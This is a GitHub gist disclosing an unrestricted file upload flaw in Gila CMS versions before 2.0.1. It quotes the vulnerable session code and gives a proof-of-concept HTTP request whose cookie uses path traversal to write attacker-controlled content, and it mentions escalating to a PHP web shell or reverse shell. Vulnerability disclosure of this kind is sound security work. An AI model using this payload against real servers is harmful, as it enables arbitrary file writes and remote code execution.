Skip to content

Instantly share code, notes, and snippets.

@victomteng1997
Last active June 1, 2021 16:02
Show Gist options
  • Save victomteng1997/73cf75b97829a153b5100fddde9b1290 to your computer and use it in GitHub Desktop.
Save victomteng1997/73cf75b97829a153b5100fddde9b1290 to your computer and use it in GitHub Desktop.
Gila CMS Unrestricted File Upload (<2.0.1)

Gila CMS (https://github.com/GilaCMS/gila) is an opensource CMS webapp. A vulnerability is found to upload arbitrary file by Gila CMS Session component for versions before 2.0.1, which may result in more serious issue.

Here we take Gila version 1.5.3 as example: https://github.com/GilaCMS/gila/tree/85e7052a90523127bb1759969fb180131e7de90d. Versions below 2.0.0 (including) are tested.

The problem is at Session.php: https://github.com/GilaCMS/gila/blob/85e7052a90523127bb1759969fb180131e7de90d/src/core/classes/Session.php, where the path is not properly filtered when saving session files. User can then pass data through User-Agent parameter and Cookie parameter.

  public static function createFile($gsession)
  {
    $data = [
      'user_agent'=>$_SERVER['HTTP_USER_AGENT']
    ];
    file_put_contents(LOG_PATH.'/sessions/'.$gsession, json_encode($data));
  }

After installation of the Gila CMS, user can craft the following network package in burp:

GET /gila/?c=admin HTTP/1.1
Host: localhost
User-Agent: "arbitrary content"
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: GSESSIONID=../../test.txt

This will result in creation of file test.txt at webapp home directory /var/www/html/gila directory. The Cookie parameter can be set to folders outside of web root /var/www/html as long as the web server has write access, which could definately result in more serious exploits. For instance, user can write <php shellexec() ?> into a .php file, or just use php reverse shell.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment